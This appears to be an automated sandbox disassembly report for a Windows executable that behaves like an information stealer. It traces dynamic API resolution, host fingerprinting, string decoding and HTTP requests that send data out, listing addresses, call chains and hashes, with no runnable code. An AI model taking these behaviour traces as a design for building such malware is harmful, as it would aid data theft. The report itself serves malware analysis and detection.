26318->26319 26320 b03fa8 26319->26320 26321 b04a60 2 API calls 26320->26321 26322 b03fbe 26321->26322 26323 b04a60 2 API calls 26322->26323 26324 b03fd4 26323->26324 26325 b04a60 2 API calls 26324->26325 26326 b03fea 26325->26326 26327 b04a60 2 API calls 26326->26327 26328 b04003 26327->26328 26329 b04a60 2 API calls 26328->26329 26330 b04019 26329->26330 26331 b04a60 2 API calls 26330->26331 26332 b0402f 26331->26332 26333 b04a60 2 API calls 26332->26333 26334 b04045 26333->26334 26335 b04a60 2 API calls 26334->26335 26336 b0405b 26335->26336 26337 b04a60 2 API calls 26336->26337 26338 b04071 26337->26338 26339 b04a60 2 API calls 26338->26339 26340 b0408a 26339->26340 26341 b04a60 2 API calls 26340->26341 26342 b040a0 26341->26342 26343 b04a60 2 API calls 26342->26343 26344 b040b6 26343->26344 26345 b04a60 2 API calls 26344->26345 26346 b040cc 26345->26346 26347 b04a60 2 API calls 26346->26347 26348 b040e2 26347->26348 26349 b04a60 2 API calls 26348->26349 26350 b040f8 26349->26350 26351 b04a60 2 API calls 26350->26351 26352 b04111 26351->26352 26353 b04a60 2 API calls 26352->26353 26354 b04127 26353->26354 26355 b04a60 2 API calls 26354->26355 26356 b0413d 26355->26356 26357 b04a60 2 API calls 26356->26357 26358 b04153 26357->26358 26359 b04a60 2 API calls 26358->26359 26360 b04169 26359->26360 26361 b04a60 2 API calls 26360->26361 26362 b0417f 26361->26362 26363 b04a60 2 API calls 26362->26363 26364 b04198 26363->26364 26365 b04a60 2 API calls 26364->26365 26366 b041ae 26365->26366 26367 b04a60 2 API calls 26366->26367 26368 b041c4 26367->26368 26369 b04a60 2 API calls 26368->26369 26370 b041da 26369->26370 26371 b04a60 2 API calls 26370->26371 26372 b041f0 26371->26372 26373 b04a60 2 API calls 26372->26373 26374 b04206 26373->26374 26375 b04a60 2 API calls 26374->26375 26376 b0421f 26375->26376 26377 b04a60 2 API calls 26376->26377 26378 b04235 26377->26378 26379 b04a60 2 API calls 26378->26379 26380 b0424b 26379->26380 26381 b04a60 2 API calls 26380->26381 26382 b04261 26381->26382 26383 b04a60 2 API calls 26382->26383 26384 b04277 26383->26384 26385 b04a60 2 API calls 26384->26385 26386 b0428d 26385->26386 26387 b04a60 2 API calls 26386->26387 26388 b042a6 26387->26388 26389 b04a60 2 API calls 26388->26389 26390 b042bc 26389->26390 26391 b04a60 2 API calls 26390->26391 26392 b042d2 26391->26392 26393 b04a60 2 API calls 26392->26393 26394 b042e8 26393->26394 26395 b04a60 2 API calls 26394->26395 26396 b042fe 26395->26396 26397 b04a60 2 API calls 26396->26397 26398 b04314 26397->26398 26399 b04a60 2 API calls 26398->26399 26400 b0432d 26399->26400 26401 b04a60 2 API calls 26400->26401 26402 b04343 26401->26402 26403 b04a60 2 API calls 26402->26403 26404 b04359 26403->26404 26405 b04a60 2 API calls 26404->26405 26406 b0436f 26405->26406 26407 b04a60 2 API calls 26406->26407 26408 b04385 26407->26408 26409 b04a60 2 API calls 26408->26409 26410 b0439b 26409->26410 26411 b04a60 2 API calls 26410->26411 26412 b043b4 26411->26412 26413 b04a60 2 API calls 26412->26413 26414 b043ca 26413->26414 26415 b04a60 2 API calls 26414->26415 26416 b043e0 26415->26416 26417 b04a60 2 API calls 26416->26417 26418 b043f6 26417->26418 26419 b04a60 2 API calls 26418->26419 26420 b0440c 26419->26420 26421 b04a60 2 API calls 26420->26421 26422 b04422 26421->26422 26423 b04a60 2 API calls 26422->26423 26424 b0443b 26423->26424 26425 b04a60 2 API calls 26424->26425 26426 b04451 26425->26426 26427 b04a60 2 API calls 26426->26427 26428 b04467 26427->26428 26429 b04a60 2 API calls 26428->26429 26430 b0447d 26429->26430 26431 b04a60 2 API calls 26430->26431 26432 b04493 26431->26432 26433 b04a60 2 API calls 26432->26433 26434 b044a9 26433->26434 26435 b04a60 2 API calls 26434->26435 26436 b044c2 26435->26436 26437 b04a60 2 API calls 26436->26437 26438 b044d8 26437->26438 26439 b04a60 2 API calls 26438->26439 26440 b044ee 26439->26440 26441 b04a60 2 API calls 26440->26441 26442 b04504 26441->26442 26443 b04a60 2 API calls 26442->26443 26444 b0451a 26443->26444 26445 b04a60 2 API calls 26444->26445 26446 b04530 26445->26446 26447 b04a60 2 API calls 26446->26447 26448 b04549 26447->26448 26449 b04a60 2 API calls 26448->26449 26450 b0455f 26449->26450 26451 b04a60 2 API calls 26450->26451 26452 b04575 26451->26452 26453 b04a60 2 API calls 26452->26453 26454 b0458b 26453->26454 26455 b04a60 2 API calls 26454->26455 26456 b045a1 26455->26456 26457 b04a60 2 API calls 26456->26457 26458 b045b7 26457->26458 26459 b04a60 2 API calls 26458->26459 26460 b045d0 26459->26460 26461 b04a60 2 API calls 26460->26461 26462 b045e6 26461->26462 26463 b04a60 2 API calls 26462->26463 26464 b045fc 26463->26464 26465 b04a60 2 API calls 26464->26465 26466 b04612 26465->26466 26467 b04a60 2 API calls 26466->26467 26468 b04628 26467->26468 26469 b04a60 2 API calls 26468->26469 26470 b0463e 26469->26470 26471 b04a60 2 API calls 26470->26471 26472 b04657 26471->26472 26473 b04a60 2 API calls 26472->26473 26474 b0466d 26473->26474 26475 b04a60 2 API calls 26474->26475 26476 b04683 26475->26476 26477 b04a60 2 API calls 26476->26477 26478 b04699 26477->26478 26479 b04a60 2 API calls 26478->26479 26480 b046af 26479->26480 26481 b04a60 2 API calls 26480->26481 26482 b046c5 26481->26482 26483 b04a60 2 API calls 26482->26483 26484 b046de 26483->26484 26485 b04a60 2 API calls 26484->26485 26486 b046f4 26485->26486 26487 b04a60 2 API calls 26486->26487 26488 b0470a 26487->26488 26489 b04a60 2 API calls 26488->26489 26490 b04720 26489->26490 26491 b04a60 2 API calls 26490->26491 26492 b04736 26491->26492 26493 b04a60 2 API calls 26492->26493 26494 b0474c 26493->26494 26495 b04a60 2 API calls 26494->26495 26496 b04765 26495->26496 26497 b04a60 2 API calls 26496->26497 26498 b0477b 26497->26498 26499 b04a60 2 API calls 26498->26499 26500 b04791 26499->26500 26501 b04a60 2 API calls 26500->26501 26502 b047a7 26501->26502 26503 b04a60 2 API calls 26502->26503 26504 b047bd 26503->26504 26505 b04a60 2 API calls 26504->26505 26506 b047d3 26505->26506 26507 b04a60 2 API calls 26506->26507 26508 b047ec 26507->26508 26509 b04a60 2 API calls 26508->26509 26510 b04802 26509->26510 26511 b04a60 2 API calls 26510->26511 26512 b04818 26511->26512 26513 b04a60 2 API calls 26512->26513 26514 b0482e 26513->26514 26515 b04a60 2 API calls 26514->26515 26516 b04844 26515->26516 26517 b04a60 2 API calls 26516->26517 26518 b0485a 26517->26518 26519 b04a60 2 API calls 26518->26519 26520 b04873 26519->26520 26521 b04a60 2 API calls 26520->26521 26522 b04889 26521->26522 26523 b04a60 2 API calls 26522->26523 26524 b0489f 26523->26524 26525 b04a60 2 API calls 26524->26525 26526 b048b5 26525->26526 26527 b04a60 2 API calls 26526->26527 26528 b048cb 26527->26528 26529 b04a60 2 API calls 26528->26529 26530 b048e1 26529->26530 26531 b04a60 2 API calls 26530->26531 26532 b048fa 26531->26532 26533 b04a60 2 API calls 26532->26533 26534 b04910 26533->26534 26535 b04a60 2 API calls 26534->26535 26536 b04926 26535->26536 26537 b04a60 2 API calls 26536->26537 26538 b0493c 26537->26538 26539 b04a60 2 API calls 26538->26539 26540 b04952 26539->26540 26541 b04a60 2 API calls 26540->26541 26542 b04968 26541->26542 26543 b04a60 2 API calls 26542->26543 26544 b04981 26543->26544 26545 b04a60 2 API calls 26544->26545 26546 b04997 26545->26546 26547 b04a60 2 API calls 26546->26547 26548 b049ad 26547->26548 26549 b04a60 2 API calls 26548->26549 26550 b049c3 26549->26550 26551 b04a60 2 API calls 26550->26551 26552 b049d9 26551->26552 26553 b04a60 2 API calls 26552->26553 26554 b049ef 26553->26554 26555 b04a60 2 API calls 26554->26555 26556 b04a08 26555->26556 26557 b04a60 2 API calls 26556->26557 26558 b04a1e 26557->26558 26559 b04a60 2 API calls 26558->26559 26560 b04a34 26559->26560 26561 b04a60 2 API calls 26560->26561 26562 b04a4a 26561->26562 26563 b266e0 26562->26563 26564 b26afe 8 API calls 26563->26564 26565 b266ed 43 API calls 26563->26565 26566 b26b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26564->26566 26567 b26c08 26564->26567 26565->26564 26566->26567 26568 b26cd2 26567->26568 26569 b26c15 8 API calls 26567->26569 26570 b26cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26568->26570 26571 b26d4f 26568->26571 26569->26568 26570->26571 26572 b26de9 26571->26572 26573 b26d5c 6 API calls 26571->26573 26574 b26f10 26572->26574 26575 b26df6 12 API calls 26572->26575 26573->26572 26576 b26f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26574->26576 26577 b26f8d 26574->26577 26575->26574 26576->26577 26578 b26fc1 26577->26578 26579 b26f96 GetProcAddress GetProcAddress 26577->26579 26580 b26ff5 26578->26580 26581 b26fca GetProcAddress GetProcAddress 26578->26581 26579->26578 26582 b27002 10 API calls 26580->26582 26583 b270ed 26580->26583 26581->26580 26582->26583 26584 b27152 26583->26584 26585 b270f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26583->26585 26586 b2715b GetProcAddress 26584->26586 26587 b2716e 26584->26587 26585->26584 26586->26587 26588 b2051f 26587->26588 26589 b27177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26587->26589 26590 b01530 26588->26590 26589->26588 26899 b01610 26590->26899 26592 b0153b 26593 b01555 lstrcpy 26592->26593 26594 b0155d 26592->26594 26593->26594 26595 b0157f 26594->26595 26596 b01577 lstrcpy 26594->26596 26597 b01599 lstrcpy 26595->26597 26599 b015a1 26595->26599 26596->26595 26597->26599 26598 b01605 26601 b1f1b0 lstrlen 26598->26601 26599->26598 26600 b015fd lstrcpy 26599->26600 26600->26598 26602 b1f1e4 26601->26602 26603 b1f1f7 lstrlen 26602->26603 26604 b1f1eb lstrcpy 26602->26604 26605 b1f208 26603->26605 26604->26603 26606 b1f21b lstrlen 26605->26606 26607 b1f20f lstrcpy 26605->26607 26608 b1f22c 26606->26608 26607->26606 26609 b1f233 lstrcpy 26608->26609 26610 b1f23f 26608->26610 26609->26610 26611 b1f258 lstrcpy 26610->26611 26612 b1f264 26610->26612 26611->26612 26613 b1f286 lstrcpy 26612->26613 26614 b1f292 26612->26614 26613->26614 26615 b1f2ba lstrcpy 26614->26615 26616 b1f2c6 26614->26616 26615->26616 26617 b1f2ea lstrcpy 26616->26617 26658 b1f300 26616->26658 26617->26658 26618 b1f30c lstrlen 26618->26658 26619 b1f4b9 lstrcpy 26619->26658 26620 b1f3a1 lstrcpy 26620->26658 26621 b1f3c5 lstrcpy 26621->26658 26622 b1f4e8 lstrcpy 26668 b1f4f0 26622->26668 26623 b1f479 lstrcpy 26623->26658 26624 b1f59c lstrcpy 26624->26668 26625 b1f70f StrCmpCA 26630 b1fe8e 26625->26630 26625->26658 26626 b1f616 StrCmpCA 26626->26625 26626->26668 26627 b1fa29 StrCmpCA 26637 b1fe2b 26627->26637 26627->26658 26628 b1f73e lstrlen 26628->26658 26629 b1fd4d StrCmpCA 26632 b1fd60 Sleep 26629->26632 26642 b1fd75 26629->26642 26631 b1fead lstrlen 26630->26631 26635 b1fea5 lstrcpy 26630->26635 26638 b1fec7 26631->26638 26632->26658 26633 b1fa58 lstrlen 26633->26658 26634 b1f64a lstrcpy 26634->26668 26635->26631 26636 b1fe4a lstrlen 26644 b1fe64 26636->26644 26637->26636 26639 b1fe42 lstrcpy 26637->26639 26645 b1fee7 lstrlen 26638->26645 26648 b1fedf lstrcpy 26638->26648 26639->26636 26640 b1f89e lstrcpy 26640->26658 26641 b1fd94 lstrlen 26657 b1fdae 26641->26657 26642->26641 26646 b1fd8c lstrcpy 26642->26646 26643 b1f76f lstrcpy 26643->26658 26651 b1fdce lstrlen 26644->26651 26652 b1fe7c lstrcpy 26644->26652 26649 b1ff01 26645->26649 26646->26641 26647 b1fbb8 lstrcpy 26647->26658 26648->26645 26656 b1ff21 26649->26656 26659 b1ff19 lstrcpy 26649->26659 26650 b1fa89 lstrcpy 26650->26658 26666 b1fde8 26651->26666 26652->26651 26653 b1f791 lstrcpy 26653->26658 26655 b1f8cd lstrcpy 26655->26668 26660 b01610 4 API calls 26656->26660 26657->26651 26663 b1fdc6 lstrcpy 26657->26663 26658->26618 26658->26619 26658->26620 26658->26621 26658->26622 26658->26623 26658->26625 26658->26627 26658->26628 26658->26629 26658->26633 26658->26640 26658->26643 26658->26647 26658->26650 26658->26653 26658->26655 26661 b1faab lstrcpy 26658->26661 26664 b01530 8 API calls 26658->26664 26665 b1fbe7 lstrcpy 26658->26665 26667 b1ee90 28 API calls 26658->26667 26658->26668 26673 b1f7e2 lstrcpy 26658->26673 26676 b1fafc lstrcpy 26658->26676 26659->26656 26685 b1fe13 26660->26685 26661->26658 26662 b1f698 lstrcpy 26662->26668 26663->26651 26664->26658 26665->26668 26669 b1fe08 26666->26669 26671 b1fe00 lstrcpy 26666->26671 26667->26658 26668->26624 26668->26626 26668->26627 26668->26629 26668->26634 26668->26658 26668->26662 26670 b1efb0 35 API calls 26668->26670 26674 b1f99e StrCmpCA 26668->26674 26675 b1f924 lstrcpy 26668->26675 26677 b1fc3e lstrcpy 26668->26677 26678 b1fcb8 StrCmpCA 26668->26678 26679 b1f9cb lstrcpy 26668->26679 26680 b01530 8 API calls 26668->26680 26681 b1fce9 lstrcpy 26668->26681 26682 b1ee90 28 API calls 26668->26682 26683 b1fa19 lstrcpy 26668->26683 26684 b1fd3a lstrcpy 26668->26684 26672 b01610 4 API calls 26669->26672 26670->26668 26671->26669 26672->26685 26673->26658 26674->26627 26674->26668 26675->26668 26676->26658 26677->26668 26678->26629 26678->26668 26679->26668 26680->26668 26681->26668 26682->26668 26683->26668 26684->26668 26685->25709 26687 b22785 26686->26687 26688 b2278c GetVolumeInformationA 26686->26688 26687->26688 26689 b227ec GetProcessHeap RtlAllocateHeap 26688->26689 26691 b22822 26689->26691 26692 b22826 wsprintfA 26689->26692 26909 b271e0 26691->26909 26692->26691 26696 b04c70 26695->26696 26697 b04c85 26696->26697 26699 b04c7d lstrcpy 26696->26699 26913 b04bc0 26697->26913 26699->26697 26700 b04c90 26701 b04ccc lstrcpy 26700->26701 26702 b04cd8 26700->26702 26701->26702 26703 b04cff lstrcpy 26702->26703 26704 b04d0b 26702->26704 26703->26704 26705 b04d2f lstrcpy 26704->26705 26706 b04d3b 26704->26706 26705->26706 26707 b04d6d lstrcpy 26706->26707 26708 b04d79 26706->26708 26707->26708 26709 b04da0 lstrcpy 26708->26709 26710 b04dac InternetOpenA StrCmpCA 26708->26710 26709->26710 26711 b04de0 26710->26711 26712 b054b8 InternetCloseHandle CryptStringToBinaryA 26711->26712 26917 b23e70 26711->26917 26713 b054e8 LocalAlloc 26712->26713 26730 b055d8 26712->26730 26715 b054ff CryptStringToBinaryA 26713->26715 26713->26730 26716 b05517 LocalFree 26715->26716 26717 b05529 lstrlen 26715->26717 26716->26730 26718 b0553d 26717->26718 26720 b05563 lstrlen 26718->26720 26721 b05557 lstrcpy 26718->26721 26719 b04dfa 26722 b04e23 lstrcpy lstrcat 26719->26722 26723 b04e38 26719->26723 26725 b0557d 26720->26725 26721->26720 26722->26723 26724 b04e5a lstrcpy 26723->26724 26727 b04e62 26723->26727 26724->26727 26726 b0558f lstrcpy lstrcat 26725->26726 26728 b055a2 26725->26728 26726->26728 26729 b04e71 lstrlen 26727->26729 26731 b055d1 26728->26731 26733 b055c9 lstrcpy 26728->26733 26732 b04e89 26729->26732 26730->25738 26731->26730 26734 b04e95 lstrcpy lstrcat 26732->26734 26735 b04eac 26732->26735 26733->26731 26734->26735 26736 b04ed5 26735->26736 26737 b04ecd lstrcpy 26735->26737 26738 b04edc lstrlen 26736->26738 26737->26736 26739 b04ef2 26738->26739 26740 b04efe lstrcpy lstrcat 26739->26740 26741 b04f15 26739->26741 26740->26741 26742 b04f36 lstrcpy 26741->26742 26743 b04f3e 26741->26743 26742->26743 26744 b04f65 lstrcpy lstrcat 26743->26744 26745 b04f7b 26743->26745 26744->26745 26746 b04fa4 26745->26746 26747 b04f9c lstrcpy 26745->26747 26748 b04fab lstrlen 26746->26748 26747->26746 26749 b04fc1 26748->26749 26750 b04fcd lstrcpy lstrcat 26749->26750 26751 b04fe4 26749->26751 26750->26751 26752 b0500d 26751->26752 26753 b05005 lstrcpy 26751->26753 26754 b05014 lstrlen 26752->26754 26753->26752 26755 b0502a 26754->26755 26756 b05036 lstrcpy lstrcat 26755->26756 26757 b0504d 26755->26757 26756->26757 26758 b05079 26757->26758 26759 b05071 lstrcpy 26757->26759 26760 b05080 lstrlen 26758->26760 26759->26758 26761 b0509b 26760->26761 26762 b050ac lstrcpy lstrcat 26761->26762 26763 b050bc 26761->26763 26762->26763 26764 b050da lstrcpy lstrcat 26763->26764 26765 b050ed 26763->26765 26764->26765 26766 b0510b lstrcpy 26765->26766 26767 b05113 26765->26767 26766->26767 26768 b05121 InternetConnectA 26767->26768 26768->26712 26769 b05150 HttpOpenRequestA 26768->26769 26770 b054b1 InternetCloseHandle 26769->26770 26771 b0518b 26769->26771 26770->26712 26924 b27310 lstrlen 26771->26924 26775 b051a4 26932 b272c0 26775->26932 26778 b27280 lstrcpy 26779 b051c0 26778->26779 26780 b27310 3 API calls 26779->26780 26781 b051d5 26780->26781 26782 b27280 lstrcpy 26781->26782 26783 b051de 26782->26783 26784 b27310 3 API calls 26783->26784 26785 b051f4 26784->26785 26786 b27280 lstrcpy 26785->26786 26787 b051fd 26786->26787 26788 b27310 3 API calls 26787->26788 26789 b05213 26788->26789 26790 b27280 lstrcpy 26789->26790 26791 b0521c 26790->26791 26792 b27310 3 API calls 26791->26792 26793 b05231 26792->26793 26794 b27280 lstrcpy 26793->26794 26795 b0523a 26794->26795 26796 b272c0 2 API calls 26795->26796 26797 b0524d 26796->26797 26798 b27280 lstrcpy 26797->26798 26799 b05256 26798->26799 26800 b27310 3 API calls 26799->26800 26801 b0526b 26800->26801 26802 b27280 lstrcpy 26801->26802 26803 b05274 26802->26803 26804 b27310 3 API calls 26803->26804 26805 b05289 26804->26805 26806 b27280 lstrcpy 26805->26806 26807 b05292 26806->26807 26808 b272c0 2 API calls 26807->26808 26809 b052a5 26808->26809 26810 b27280 lstrcpy 26809->26810 26811 b052ae 26810->26811 26812 b27310 3 API calls 26811->26812 26813 b052c3 26812->26813 26814 b27280 lstrcpy 26813->26814 26815 b052cc 26814->26815 26816 b27310 3 API calls 26815->26816 26817 b052e2 26816->26817 26818 b27280 lstrcpy 26817->26818 26819 b052eb 26818->26819 26820 b27310 3 API calls 26819->26820 26821 b05301 26820->26821 26822 b27280 lstrcpy 26821->26822 26823 b0530a 26822->26823 26824 b27310 3 API calls 26823->26824 26825 b0531f 26824->26825 26826 b27280 lstrcpy 26825->26826 26827 b05328 26826->26827 26828 b272c0 2 API calls 26827->26828 26829 b0533b 26828->26829 26830 b27280 lstrcpy 26829->26830 26831 b05344 26830->26831 26832 b05370 lstrcpy 26831->26832 26833 b0537c 26831->26833 26832->26833 26834 b272c0 2 API calls 26833->26834 26835 b0538a 26834->26835 26836 b272c0 2 API calls 26835->26836 26837 b05397 26836->26837 26838 b27280 lstrcpy 26837->26838 26839 b053a1 26838->26839 26840 b053b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 26839->26840 26841 b0549c InternetCloseHandle 26840->26841 26845 b053f2 26840->26845 26843 b054ae 26841->26843 26842 b053fd lstrlen 26842->26845 26843->26770 26844 b0542e lstrcpy lstrcat 26844->26845 26845->26841 26845->26842 26845->26844 26846 b05473 26845->26846 26847 b0546b lstrcpy 26845->26847 26848 b0547a InternetReadFile 26846->26848 26847->26846 26848->26841 26848->26845 26850 b18cc6 ExitProcess 26849->26850 26865 b18ccd 26849->26865 26851 b18ee2 26851->25740 26852 b18d30 lstrlen 26852->26865 26853 b18e56 StrCmpCA 26853->26865 26854 b18d5a lstrlen 26854->26865 26855 b18dbd StrCmpCA 26855->26865 26856 b18ddd StrCmpCA 26856->26865 26857 b18dfd StrCmpCA 26857->26865 26858 b18e1d StrCmpCA 26858->26865 26859 b18e3d StrCmpCA 26859->26865 26860 b18d84 StrCmpCA 26860->26865 26861 b18da4 StrCmpCA 26861->26865 26862 b18d06 lstrlen 26862->26865 26863 b18e88 lstrlen 26863->26865 26864 b18e6f StrCmpCA 26864->26865 26865->26851 26865->26852 26865->26853 26865->26854 26865->26855 26865->26856 26865->26857 26865->26858 26865->26859 26865->26860 26865->26861 26865->26862 26865->26863 26865->26864 26866 b18ebb lstrcpy 26865->26866 26866->26865 26867->25746 26868->25748 26869->25754 26870->25756 26871->25762 26872->25764 26873->25770 26874->25774 26875->25780 26876->25782 26877->25786 26878->25800 26879->25804 26880->25803 26881->25799 26882->25803 26883->25822 26884->25806 26885->25807 26886->25811 26887->25817 26888->25819 26889->25825 26890->25828 26891->25835 26892->25857 26893->25861 26894->25860 26895->25856 26896->25860 26897->25870 26900 b0161f 26899->26900 26901 b0162b lstrcpy 26900->26901 26902 b01633 26900->26902 26901->26902 26903 b0164d lstrcpy 26902->26903 26904 b01655 26902->26904 26903->26904 26905 b0166f lstrcpy 26904->26905 26907 b01677 26904->26907 26905->26907 26906 b01699 26906->26592 26907->26906 26908 b01691 lstrcpy 26907->26908 26908->26906 26910 b271e6 26909->26910 26911 b22860 26910->26911 26912 b271fc lstrcpy 26910->26912 26911->25735 26912->26911 26914 b04bd0 26913->26914 26914->26914 26915 b04bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 26914->26915 26916 b04c41 26915->26916 26916->26700 26918 b23e83 26917->26918 26919 b23e9f lstrcpy 26918->26919 26920 b23eab 26918->26920 26919->26920 26921 b23ed5 GetSystemTime 26920->26921 26922 b23ecd lstrcpy 26920->26922 26923 b23ef3 26921->26923 26922->26921 26923->26719 26926 b2732d 26924->26926 26925 b0519b 26928 b27280 26925->26928 26926->26925 26927 b2733d lstrcpy lstrcat 26926->26927 26927->26925 26929 b2728c 26928->26929 26930 b272b4 26929->26930 26931 b272ac lstrcpy 26929->26931 26930->26775 26931->26930 26933 b272dc 26932->26933 26934 b051b7 26933->26934 26935 b272ed lstrcpy 26933->26935 26934->26778 26936 b272fb lstrcat 26935->26936 26936->26934 26962 b231f0 GetSystemInfo wsprintfA 26953 b28471 121 API calls 2 library calls 26954 b14c77 295 API calls 26945 b1e0f9 140 API calls 26995 b16b79 138 API calls 26956 b08c79 malloc 26972 b1f2f8 93 API calls 26984 b0bbf9 90 API calls 26996 b01b64 162 API calls 26997 b272fb lstrcat 26966 b22d60 11 API calls 26998 b22b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 26999 b2a280 __CxxFrameHandler 26977 b11269 408 API calls 26957 b05869 57 API calls 26958 b22853 lstrcpy 26946 b22cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 26963 b101d9 126 API calls 26968 b13959 244 API calls 26947 b23cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 26985 b233c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27001 b18615 49 API calls 26960 b1e049 147 API calls 26986 b18615 48 API calls
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B04C7F
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B04CD2
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B04D05
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B04D35
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B04D73
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B04DA6
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B04DB6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: 88af1786fe6813cb4bb50d3a522afefeef088d33e0ec9a603e478d224e181a9e
                            • Instruction ID: 411bac599f4af61d9f9a8f431c061d64e88948c8eaa0594939d1133233a0450d
                            • Opcode Fuzzy Hash: 88af1786fe6813cb4bb50d3a522afefeef088d33e0ec9a603e478d224e181a9e
                            • Instruction Fuzzy Hash: 9C527F719106169BDB21EFA4DC89A9EBFF9EF44300F1444A4F905E7291DF74EC468BA0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2125 b26390-b263bd GetPEB 2126 b265c3-b26623 LoadLibraryA * 5 2125->2126 2127 b263c3-b265be call b262f0 GetProcAddress * 20 2125->2127 2129 b26625-b26633 GetProcAddress 2126->2129 2130 b26638-b2663f 2126->2130 2127->2126 2129->2130 2131 b26641-b26667 GetProcAddress * 2 2130->2131 2132 b2666c-b26673 2130->2132 2131->2132 2134 b26675-b26683 GetProcAddress 2132->2134 2135 b26688-b2668f 2132->2135 2134->2135 2136 b26691-b2669f GetProcAddress 2135->2136 2137 b266a4-b266ab 2135->2137 2136->2137 2139 b266d7-b266da 2137->2139 2140 b266ad-b266d2 GetProcAddress * 2 2137->2140 2140->2139
                            APIs
                            • GetProcAddress.KERNEL32(77190000,018717C8), ref: 00B263E9
                            • GetProcAddress.KERNEL32(77190000,018716D8), ref: 00B26402
                            • GetProcAddress.KERNEL32(77190000,01871648), ref: 00B2641A
                            • GetProcAddress.KERNEL32(77190000,018716F0), ref: 00B26432
                            • GetProcAddress.KERNEL32(77190000,01878978), ref: 00B2644B
                            • GetProcAddress.KERNEL32(77190000,01865448), ref: 00B26463
                            • GetProcAddress.KERNEL32(77190000,018654C8), ref: 00B2647B
                            • GetProcAddress.KERNEL32(77190000,01871738), ref: 00B26494
                            • GetProcAddress.KERNEL32(77190000,01871780), ref: 00B264AC
                            • GetProcAddress.KERNEL32(77190000,01871678), ref: 00B264C4
                            • GetProcAddress.KERNEL32(77190000,01871768), ref: 00B264DD
                            • GetProcAddress.KERNEL32(77190000,01865468), ref: 00B264F5
                            • GetProcAddress.KERNEL32(77190000,01871690), ref: 00B2650D
                            • GetProcAddress.KERNEL32(77190000,018716C0), ref: 00B26526
                            • GetProcAddress.KERNEL32(77190000,01865488), ref: 00B2653E
                            • GetProcAddress.KERNEL32(77190000,018717E0), ref: 00B26556
                            • GetProcAddress.KERNEL32(77190000,01871540), ref: 00B2656F
                            • GetProcAddress.KERNEL32(77190000,018655C8), ref: 00B26587
                            • GetProcAddress.KERNEL32(77190000,018717F8), ref: 00B2659F
                            • GetProcAddress.KERNEL32(77190000,01865408), ref: 00B265B8
                            • LoadLibraryA.KERNEL32(01871888,?,?,?,00B21C03), ref: 00B265C9
                            • LoadLibraryA.KERNEL32(01871810,?,?,?,00B21C03), ref: 00B265DB
                            • LoadLibraryA.KERNEL32(01871870,?,?,?,00B21C03), ref: 00B265ED
                            • LoadLibraryA.KERNEL32(018718B8,?,?,?,00B21C03), ref: 00B265FE
                            • LoadLibraryA.KERNEL32(01871828,?,?,?,00B21C03), ref: 00B26610
                            • GetProcAddress.KERNEL32(76850000,018718A0), ref: 00B2662D
                            • GetProcAddress.KERNEL32(77040000,01871840), ref: 00B26649
                            • GetProcAddress.KERNEL32(77040000,01871858), ref: 00B26661
                            • GetProcAddress.KERNEL32(75A10000,01878D80), ref: 00B2667D
                            • GetProcAddress.KERNEL32(75690000,01865388), ref: 00B26699
                            • GetProcAddress.KERNEL32(776F0000,01878A98), ref: 00B266B5
                            • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00B266CC
                            Strings
                            • NtQueryInformationProcess, xrefs: 00B266C1
